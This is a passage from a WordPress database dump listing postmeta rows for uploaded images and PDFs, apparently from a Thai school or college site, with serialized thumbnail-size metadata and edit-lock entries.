0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27148, 10945, '_wp_attached_file', '2020/12/14.jpg'),
(27149, 10945, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/14.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"14-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"14-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"14-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"14-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27150, 10946, '_wp_attached_file', '2020/12/15.jpg'),
(27151, 10946, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/15.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"15-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"15-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"15-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"15-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27152, 10947, '_wp_attached_file', '2020/12/16.jpg'),
(27153, 10947, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/16.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"16-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"16-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"16-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"16-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27154, 10948, '_wp_attached_file', '2020/12/17.jpg'),
(27155, 10948, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/17.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"17-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"17-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"17-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"17-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27156, 10949, '_wp_attached_file', '2020/12/18.jpg'),
(27157, 10949, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/18.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"18-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"18-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"18-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"18-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27158, 10950, '_wp_attached_file', '2020/12/19.jpg'),
(27159, 10950, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/19.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"19-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"19-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"19-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"19-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27160, 10951, '_wp_attached_file', '2020/12/20.jpg'),
(27161, 10951, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/20.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"20-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"20-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"20-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"20-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27162, 10954, '_wp_attached_file', '2020/12/1.1.jpg'),
(27163, 10954, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:15:\"2020/12/1.1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1.1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1.1-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1.1-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1.1-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1.1-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27164, 10955, '_wp_attached_file', '2020/12/1.2.jpg'),
(27165, 10955, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:15:\"2020/12/1.2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1.2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1.2-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1.2-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1.2-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1.2-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27166, 10964, '_edit_lock', '1608279584:14'),
(27167, 10964, '_edit_last', '14'),
(27168, 10965, '_wp_attached_file', '2020/12/รูปเล่มรายงานผลการปฏิบัติงาน-ตามผนปฏิบัต.pdf'),
(27169, 10964, '_hide_featured', NULL),
(27170, 10970, '_wp_attached_file', '2019/12/211263.jpg'),
(27171, 10970, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:450;s:4:\"file\";s:18:\"2019/12/211263.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"211263-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"211263-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"211263-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"211263-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"211263-400x100.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27172, 10971, '_wp_attached_file', '2019/12/211263.png'),
(27173, 10971, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:450;s:4:\"file\";s:18:\"2019/12/211263.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"211263-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"211263-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"211263-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"211263-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"211263-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27174, 10972, '_edit_lock', '1608877767:14'),
(27175, 10972, '_edit_last', '14'),
(27176, 10973, '_wp_attached_file', '2020/12/ประกาศพ้นสภาพไม่ลงทะเบียน2-63.pdf'),
(27177, 10972, '_hide_featured', NULL),
(27178, 10979, '_edit_lock', '1608522260:14'),
(27179, 10979, '_edit_last', '14'),
(27180, 10980, '_wp_attached_file', '2020/12/ประกาศรายชื่อครูEและจนท.pdf'),
(27183, 10979, '_hide_featured', NULL),
(27188, 10983, '_edit_lock', '1608799238:14'),
(27189, 10983, '_edit_last', '14'),
(27190, 10984, '_wp_attached_file', '2020/12/ประกาศงานสวัสดิการ.pdf'),
(27193, 10983, '_hide_featured', NULL),
(27198, 10989, '_wp_attached_file', '2020/12/โครงการอนุรักษ์พันธุกรรมพืช63.jpg'),
(27199, 10989, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:95:\"2020/12/โครงการอนุรักษ์พันธุกรรมพืช63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:95:\"โครงการอนุรักษ์พันธุกรรมพืช63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:95:\"โครงการอนุรักษ์พันธุกรรมพืช63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:96:\"โครงการอนุรักษ์พันธุกรรมพืช63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:96:\"โครงการอนุรักษ์พันธุกรรมพืช63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:95:\"โครงการอนุรักษ์พันธุกรรมพืช63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27200, 10990, '_wp_attached_file', '2020/12/โครงการทัศนศึกษา.jpg'),
(27201, 10990, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:60:\"2020/12/โครงการทัศนศึกษา.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"โครงการทัศนศึกษา-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"โครงการทัศนศึกษา-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"โครงการทัศนศึกษา-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"โครงการทัศนศึกษา-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"โครงการทัศนศึกษา-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27202, 10991, '_wp_attached_file', '2020/12/โครงการศสานาและวัฒนธรรม.jpg'),
(27203, 10991, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:81:\"2020/12/โครงการศสานาและวัฒนธรรม.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:81:\"โครงการศสานาและวัฒนธรรม-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:81:\"โครงการศสานาและวัฒนธรรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:82:\"โครงการศสานาและวัฒนธรรม-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:82:\"โครงการศสานาและวัฒนธรรม-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:81:\"โครงการศสานาและวัฒนธรรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27204, 10992, '_wp_attached_file', '2020/12/เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63.jpg'),
(27205, 10992, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:159:\"2020/12/เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:159:\"เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:159:\"เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:160:\"เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:160:\"เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:159:\"เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27206, 10993, '_wp_attached_file', '2020/12/โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63.jpg'),
(27207, 10993, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:116:\"2020/12/โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:116:\"โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:116:\"โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:117:\"โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:117:\"โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s: